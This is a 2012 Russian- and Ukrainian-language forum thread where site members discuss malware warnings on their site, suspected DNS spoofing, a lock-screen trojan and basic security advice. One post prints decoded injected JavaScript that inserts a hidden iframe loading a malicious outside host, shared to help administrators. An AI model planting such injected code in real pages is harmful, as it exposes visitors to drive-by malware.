Вредноносная прога
Автор
alexcrym
, 22 Oct 2012 07:32
Сообщений в теме: 78
#43 ВНЕ САЙТА
#44 ВНЕ САЙТА
Отправлено 26 October 2012 - 10:15
А по теме, просто есть азы безопасности. Полезно почитать памятку о безопасном использовании интернет банкинга у любого банка:
- Для входа в систему не используйте подключение по баннерным ссылкам либо ссылкам, полученным по электронной почте.
- Не отвечайте на запросы (чаще всего рассылаются через электронную почту), содержащие требование предоставить или проверить логин и пароль.
- Рекомендуется удалять подозрительные электронные письма, не открывая их, особенно письма от неизвестных отправителей с прикрепленными файлами с расширениями *.exe, *.pif, *.vbs и другие файлы.
и т.д. и т.п.
- Для входа в систему не используйте подключение по баннерным ссылкам либо ссылкам, полученным по электронной почте.
- Не отвечайте на запросы (чаще всего рассылаются через электронную почту), содержащие требование предоставить или проверить логин и пароль.
- Рекомендуется удалять подозрительные электронные письма, не открывая их, особенно письма от неизвестных отправителей с прикрепленными файлами с расширениями *.exe, *.pif, *.vbs и другие файлы.
и т.д. и т.п.
#45 ВНЕ САЙТА
Отправлено 26 October 2012 - 12:35
Всі ці ази ніяк не допомагають при атаках типу «DNS Spoofing», яка, на мою думку, мала місце в даному випадку. Трошки допомагають своєчасні оновлення програмного забезпечення Ваших машин (дозволяють позбутись проблем, коли підставний сайт зміює адресу в полі вводу та заголоку вікна на відповідні адреси реального сайту).
Коротше, софт має бути свіжим, антивірус—оновленим, файрвол просто має бути, бо наші провайдери часто виставляють комп’ютери клієнтів «голою ж в Інтернет».
Коротше, софт має бути свіжим, антивірус—оновленим, файрвол просто має бути, бо наші провайдери часто виставляють комп’ютери клієнтів «голою ж в Інтернет».
#46 ВНЕ САЙТА
Отправлено 26 October 2012 - 17:22
обнаружено: троянская программа HEUR:Exploit.Script.Blocker файл: http://ecwosrvyqrzka...94/jAA2ingo.jar
#50 ВНЕ САЙТА
Отправлено 29 October 2012 - 10:30
Вот это наглость!!!Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
http://yandex.ua/yan...окировка&lr=143
#52 ВНЕ САЙТА
Отправлено 29 October 2012 - 12:38
О, я сегодня случайно словил интересную фигню, когда постил сообщение. Для интереса немного поковырялся и получилось вот что: двойной eval в js - на такую конструкцию почти любой антивирь заругается в "параноидальном" режиме. А тело скрипта еще и зашифровано ко всем радостям... я у себя проверил - вроде ничего вредного, просто добавляет ссылки на какой то левый сайт, вот расшифрованный код, который эвалится:
Надеюсь эта инфа поможет админам в устранении проблемы.
var newIframe=document.createElement('iframe');newIframe.src='http://ynefgawcfrol.cnisemi.com/do.php?fn=1&id=108&pageLoad=';newIframe.style.width='10px';newIframe.style.height='10px';newIframe.style.position='absolute';newIframe.style.top='-100px';newIframe.style.left='-100px';document.body.insertBefore(newIframe, document.body.firstChild);
Надеюсь эта инфа поможет админам в устранении проблемы.
- Hakim это нравится
#53 ВНЕ САЙТА
Отправлено 29 October 2012 - 13:02
http://whois.domaintools.com/cnisemi.com китайские хакеры.добавляет ссылки на какой то левый сайт, вот расшифрованный код, который эвалится:
Я так понимаю, что наших читателей в Китае нет, так что заблокировать нахрен весь IP-диапазон на уровне хостера.
- Predator и Shamba это нравится
#55 ВНЕ САЙТА
Отправлено 29 October 2012 - 15:00
Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
Изображение
Можно как-то наказать шутников? Или проклятие наслать?
Или хотя бы код для разблокирования подскажите...
Эта же куйня и на меня напала
В безопасном режиме убрал из автозагрузки файл ms
И удалил ms.exe по адресу указанному в автозагрузке.
- Predator это нравится
#56 ВНЕ САЙТА
Отправлено 29 October 2012 - 15:04
О, так вже краще.обнаружено: троянская программа HEUR:Exploit.Script.Blocker файл: http://ecwosrvyqrzka...94/jAA2ingo.jar
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.
Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.
#57 ВНЕ САЙТА
Отправлено 29 October 2012 - 15:26
О, в полку извращенцев прибыло!Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
http://www.offroadma...st__p__26279677
#58 ВНЕ САЙТА
Отправлено 29 October 2012 - 18:02
О, так вже краще.
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.
Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.
Кстати, скорее всего это решение проблемы.
У меня в настройках: предпочитаемый DNS-сервер 8.8.8.8. гугловский, а уже в альтернативных свой. Может поэтому никогда проблем не было?
#59 ВНЕ САЙТА
Отправлено 29 October 2012 - 21:51
У меня опять предупреждение выдало, причем файлы не хавает. Вот что пишет - "Последняя проверка (менее двух дней назад) показала, что на сайте размещён вредоносный код. Вредоносный код: обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО; содержит Mal/ExpJS-AN, Troj/ExpJS-FU (по данным компании Sophos)".
Все таки кто то наш сервер таки заразил. Я гляжу, у нас много недоброжелателей появилось...
Все таки кто то наш сервер таки заразил. Я гляжу, у нас много недоброжелателей появилось...
Сообщение отредактировал Важняк: 29 October 2012 - 21:52
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 скрытых пользователей